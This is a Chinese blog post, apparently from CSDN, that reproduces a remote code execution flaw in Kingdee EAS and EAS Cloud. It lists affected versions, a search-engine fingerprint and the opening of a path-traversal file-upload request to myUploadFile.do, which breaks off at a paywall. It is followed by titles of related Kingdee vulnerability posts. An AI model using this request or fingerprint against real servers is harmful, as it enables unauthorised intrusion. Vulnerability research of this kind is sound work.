金蝶EAS、EAS Cloud远程代码执行漏洞

已于 2023-10-27 14:38:51 修改
阅读量1k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 网络 java servlet 前端
于 2023-10-13 16:41:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hackzkaq/article/details/133812942

【漏洞概述】

金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。

【漏洞介绍】

金蝶 EAS 及 EAS Cloud 存在远程代码执行漏洞

【影响版本】

金蝶 EAS 8.0,8.1,8.2,8.5
金蝶 EAS Cloud 8.6私有云,8.6公有云,8.6.1,8.8

【指纹】

app=”Kingdee-EAS”

【产品界面】

图片

【利用过程】
Kingdee EAS EAS Cloud myUploadFile.do接口存在任意文件上传问题

POST /easportal/xxx/%2e%2e/xxx/myUploadFile.do HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySq4lDnabv8CwHfvx
Cookie: sl-session=sqPhC9MLJmWsiN7c9/P6tA==
Accept-Encoding: gzip, d
最低0.47元/天 解锁文章
漏洞复现】金蝶 EAS createdatasource jndi 远程代码执行漏洞
qq_67810151的博客
04-03 652
金蝶 EAS 存在JNDI注入漏洞,未授权的攻击者可以通过该漏洞进行远程代码执行,导致服务器被控制。
金蝶 EASEAS Cloud任意文件上传漏洞复现
0xSec
11-20 1477
金蝶 EASEAS Cloud 在 uploadLogo.action 接口处存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、从而可能导致服务器受到攻击并被控制。
金蝶EAS代码执行漏洞
zkaqlaoniao的博客
10-13 466
金蝶 EASEAS Cloud金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。金蝶 EASEAS Cloud 存在远程代码执行漏洞
金蝶-EAS easWebClient 任意文件读取漏洞复现
02-20 3436
金蝶-EAS是一款面向大中型企业的管理软件,涵盖了财务、人力资源、采购、库存等多个功能模块,支持云计算和个性化定制,适合集团企业管理使用。
【复现】金蝶EAS系统 文件读取漏洞_13
fushuang333的博客
01-09 2111
【复现】金蝶EAS 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取的文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件。
EAS Cloud系统存在源代码泄露漏洞
最新发布
m0_65409532的博客
08-23 500
Burp抓包->正常响应。
漏洞复现】金蝶EAS uploadlogo 存在任意文件上传漏洞
https://blog.echo234.cn/
03-28 1217
金蝶EAS帮助企业构筑业财资税票档一体化平台,提升企业在市场竞争中的数字战斗力,金蝶EAS uploadlogo存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
漏洞复现】金蝶EASEAS Cloud远程代码执行漏洞
2301_80127209的博客
04-03 1589
金蝶 EASEAS Cloud金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。金蝶 EASEAS Cloud 存在远程代码执行漏洞
金蝶 EASEAS Cloud JNDI注入漏洞复现
0xSec
12-22 1664
金蝶 EASEAS Cloudappmonitor/protect/jndi/loadTree 路径 jndiName 参数存在JNDI注入漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
java导致敏感信息泄漏的异常_金蝶AES系统Java web配置文件敏感信息泄露漏洞
weixin_42123296的博客
03-09 1015
### 0x01 漏洞框架金蝶软件始创于1993年,是一家ERP、财务等企业管理软件厂商,拥有官网(kigndee.com)、友商网(youshang.com)、快递100(kuaidi100.com)、云之家(kdweibo.com)等互联网业务应用官方主页:www.kingdee.com客户案例:![](https://images.seebug.org/contribute/f1e376de...
金蝶EAS执行漏洞
2301_80115097的博客
10-13 483
金蝶 EASEAS Cloud金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。金蝶 EASEAS Cloud 存在远程代码执行漏洞
金蝶EAS pdfviewlocal.jsp接口存在任意文件读取漏洞 附POC软件
nnn2188185的博客
01-08 1029
金蝶EAS pdfviewlocal.jsp接口存在任意文件读取漏洞 附POC软件
kingdee漏洞金蝶云星空存在弱口令漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-19 2160
​ kingdee漏洞简介,金蝶云星是基于云计算、大数据、社交、人工智能、物联网等前沿技术研发的新一代战略性企业管理软件。金蝶云星空存在弱口令漏洞,攻击者利用该漏洞登录系统后台,获取敏感信息。 CNNVD编号:CNVD-2022-15854 危害等级: 中危 CVE编号:未知 漏洞类型:通用型漏洞 威胁类型:未知 厂商:未知 漏洞来源:国家信息安全漏洞共享平台
金蝶云星空servicegateway接口存在反序列化漏洞
qq_39573664的博客
12-27 1127
金蝶云星空管理中心在servicegateway-getserviceuri-common存在反序列化漏洞,外部攻击者可通过使用恶意攻击手段对目标系统进行权限获取,进而接管服务器控制权。
漏洞复现】​金蝶云星空管理中心反序列化命令执行漏洞(RCE)
李火火的安全圈
07-23 4250
金蝶云星空管理中心是金蝶软件(中国)有限公司基于云计算、大数据、社交、人工智能、物联网等前沿技术研发的新一代战略性企业管理软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。该软件存在远程命令执行漏洞,外部攻击者可通过使用恶意攻击手段对目标系统进行权限获取,进而接管服务器控制权。
漏洞复现】金蝶云星空-DevReportService-反序列化-rce
知黑而守白
01-25 246
金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。该漏洞是由于金蝶云星空数据通信默认采用的是二进制数据格式,需要进行序列化与反序列化,在此过程中未对数据进行签名或校验,导致客户端发出的数据可被攻击者恶意篡改,写入包含恶意代码的序列化数据,达到在服务端远程命令执行的效果。
漏洞复现-金蝶系列
aming小老弟
03-14 1793
金蝶软件是中国领先的企业管理软件及云服务提供商,拥有众多产品和解决方案,其中包括四个主要产品系列。这四个产品系列分别是:金蝶ERP(Enterprise Resource Planning): 金蝶ERP是金蝶软件的核心产品之一,是一套全面的企业管理软件解决方案,涵盖了财务、供应链管理、生产制造、人力资源管理等多个领域,为企业提供全面的业务管理功能。金蝶ERP产品线包括不同版本,以满足不同规模和行业的企业需求。
【成功复现】金蝶云星空反序列化远程代码执行漏洞
wuli1024的博客
01-25 3695
金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2746
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值